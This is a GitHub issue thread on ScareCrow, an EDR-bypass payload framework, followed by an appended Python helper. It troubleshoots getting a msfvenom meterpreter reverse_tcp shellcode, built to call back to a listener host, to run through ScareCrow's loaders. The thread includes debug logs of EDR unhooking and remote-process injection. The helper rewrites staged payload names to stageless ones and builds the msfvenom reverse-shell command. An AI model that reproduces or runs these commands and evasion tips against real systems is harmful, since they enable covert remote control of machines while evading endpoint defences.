optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.

Newest version v4.1 not working with msfvenom payload #57

Closed gumbyDE closed 2 years ago

gumbyDE commented 2 years ago

I created a msfvenom payload with

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=5555 -f raw -o msfvenom.bin

and then put it into ScareCrow with

/opt/ScareCrow/ScareCrow -I /tmp/msfvenom.bin -domain google.com

Doing it with version 4.01 results in a successful connection. However, when I update to the newest version 4.1 and try the same, I don't get anything back.

I enabled the console output but there are no error messages (this is the output when I tried the -injection method, but still had no luck):

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Creating Remote Process: 7740
[DEBUG] [*] Creating Handle to Remote Process
EnumProcessModules: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
[DEBUG] [+] Interacting with Remote Process
[DEBUG] [*] Mapping Modules:
[DEBUG] [+] Injecting Shellcode into Remote Process
[DEBUG] [+] Injected!

Any ideas are appreciated.

Tylous commented 2 years ago

Does this happen with other loaders?

gumbyDE commented 2 years ago

I just tested it again today. It works with a Covenant grunt, but not with msfvenom.

I even got an exception today:

# .\scarecrow_new.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll 
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll 
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll 
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll 
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
.\scarecrow_new.exe : Exception 0xc0000005 0x0 0xd8f5374000 0xc00006c000
At line:1 char:4
+ . {.\scarecrow_new.exe
+    ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (Exception 0xc00...00 0xc00006c000:String) [], Remote 
   Exception
    + FullyQualifiedErrorId : NativeCommandError

PC=0xc00006c000

runtime.cgocall(0xfe800, 0x25bb80)
    runtime/cgocall.go:157 +0x4a fp=0xc00009be18 sp=0xc00009bde0 pc=0xa342a
syscall.SyscallN(0xc00006c000?, {0xc00009beb0?, 0x3?, 0xac787?})
    runtime/syscall_windows.go:538 +0x109 fp=0xc00009be90 sp=0xc00009be18 pc=0xf9ba9
syscall.Syscall(0x180050?, 0xc00000d050?, 0x5?, 0x5?, 0x0?)
    runtime/syscall_windows.go:476 +0x3b fp=0xc00009bed8 sp=0xc00009be90 pc=0xf997b
main.main()
    AM_2dKM3.go:1 +0x2c7 fp=0xc00009bf80 sp=0xc00009bed8 pc=0x15e967
runtime.main()
    runtime/proc.go:250 +0x1fe fp=0xc00009bfe0 sp=0xc00009bf80 pc=0xd601e
runtime.goexit()
    runtime/asm_amd64.s:1571 +0x1 fp=0xc00009bfe8 sp=0xc00009bfe0 pc=0xfcfa1

rax     0xc00006c000
rbx     0x25bb80
rcx     0x0
rdi     0x18f5308000
rsi     0xc00009be50
rbp     0xc00009be08
rsp     0x18f55ff698
r8      0x0
r9      0x0
r10     0x0
r11     0x202
r12     0x0
r13     0x0
r14     0xc000030000
r15     0xffffffffffffffff
rip     0xc00006c000
rflags  0x10297
cs      0x33
fs      0x53
gs      0x2b

Tylous commented 2 years ago
Tylous commented 2 years ago

what happens when you try -Loader dll?

gumbyDE commented 2 years ago

Sorry, I think I initially misunderstood your question. I totally spaced out and forgot that you can create multiple payloads with the loader option and thought you meant the payload.

I tried it with the -Loader dll option and it worked. No crash, no exception, just worked.

Tylous commented 2 years ago

I think it has to do with how MSF shellcode needed the pointer, since binary loaders call the shellcode differently than the other loaders. Still investigating.

Tylous commented 2 years ago

So after some digging, it looks like stageless MSFvenom shellcode works. As I mention in the README, you need to use stageless shellcode.

gumbyDE commented 2 years ago

I got it to work using the non-staged payload. Interesting that the old version managed it somehow but the new one doesn't. Will use this one for now.
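The fix the thread lands on is "use the stageless payload". The following is an added example, not code from the issue, ScareCrow or Metasploit: it encodes the Metasploit naming convention (a `/` between stage and stager, as in `meterpreter/reverse_tcp`, is staged; an `_`, as in `meterpreter_reverse_tcp`, is stageless), rewrites a staged name to its stageless twin, reproduces the msfvenom command line from the issue, and sanity-checks a raw `.bin` before it is fed to `ScareCrow -I`. The 4 KiB size threshold, the short list of stage families and the leading `0xFC` (cld) check for unencoded msfvenom Windows shellcode are assumptions and heuristics of this example, not documented behaviour of either tool; the two sample blobs are constructed inline.

```python
"""Pre-flight checks for msfvenom shellcode destined for ScareCrow (added example)."""
import shlex

# Assumption: families Metasploit ships in both staged (family/stager) and
# stageless (family_stager) form. Non-exhaustive; extend as needed.
STAGE_FAMILIES = ("meterpreter", "shell", "vncinject", "dllinject")

# Assumption (heuristic): a raw x64 reverse_tcp stager is a few hundred bytes,
# a stageless meterpreter blob is hundreds of KiB. Below this, assume stager.
STAGER_MAX_BYTES = 4096


def payload_kind(payload: str) -> str:
    """Classify a Metasploit payload name as 'staged', 'stageless' or 'single'."""
    parts = payload.strip("/").split("/")
    last = parts[-1]
    if len(parts) >= 2 and parts[-2] in STAGE_FAMILIES:
        return "staged"          # e.g. windows/x64/meterpreter/reverse_tcp
    if any(last.startswith(f + "_") for f in STAGE_FAMILIES):
        return "stageless"       # e.g. windows/x64/meterpreter_reverse_tcp
    return "single"              # e.g. windows/x64/exec


def stageless_equivalent(payload: str) -> str:
    """Rewrite a staged name to its stageless twin; other names pass through."""
    if payload_kind(payload) != "staged":
        return payload
    parts = payload.strip("/").split("/")
    return "/".join(parts[:-2] + [parts[-2] + "_" + parts[-1]])


def msfvenom_command(payload: str, lhost: str, lport: int, out_path: str) -> str:
    """Build the msfvenom invocation with the same flags the issue uses (-f raw -o)."""
    argv = ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", "raw", "-o", out_path]
    return " ".join(shlex.quote(a) for a in argv)


def check_blob(data: bytes) -> list:
    """Return warnings for a raw blob that looks unsuitable for a stageless loader."""
    warnings = []
    if not data:
        return ["empty blob"]
    if len(data) < STAGER_MAX_BYTES:
        warnings.append(f"{len(data)} bytes: looks like a staged stager, "
                        "not a stageless payload")
    # Heuristic: unencoded msfvenom Windows shellcode begins with cld (0xFC).
    if data[0] != 0xFC:
        warnings.append("does not start with 0xFC (cld); not typical "
                        "unencoded msfvenom Windows shellcode")
    return warnings


# Constructed sample blobs (not real Metasploit output): a 510-byte stager-sized
# blob and a 200 KiB stageless-sized blob, both with the x64 msfvenom prologue.
X64_PROLOGUE = b"\xfc\x48\x83\xe4\xf0"
FAKE_STAGER = X64_PROLOGUE + b"\x90" * (510 - len(X64_PROLOGUE))
FAKE_STAGELESS = X64_PROLOGUE + b"\x90" * (200 * 1024 - len(X64_PROLOGUE))


def preflight(payload: str, blob: bytes) -> dict:
    """Summarise what a user should know before running ScareCrow -I on the blob."""
    return {
        "kind": payload_kind(payload),
        "suggested_payload": stageless_equivalent(payload),
        "blob_warnings": check_blob(blob),
    }


if __name__ == "__main__":
    staged = "windows/x64/meterpreter/reverse_tcp"
    print(preflight(staged, FAKE_STAGER))
    print(msfvenom_command(stageless_equivalent(staged), "10.0.2.15", 5555,
                           "/tmp/msfvenom.bin"))
    print(preflight(stageless_equivalent(staged), FAKE_STAGELESS))
```

Running it prints the staged name flagged together with a size warning for the small blob, the corrected command line (`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=5555 -f raw -o /tmp/msfvenom.bin`), and a clean result for the stageless-sized blob. The size check is deliberately conservative: an encoded or oddly packed payload can trip the prologue heuristic, so treat the warnings as prompts to look again rather than as hard failures.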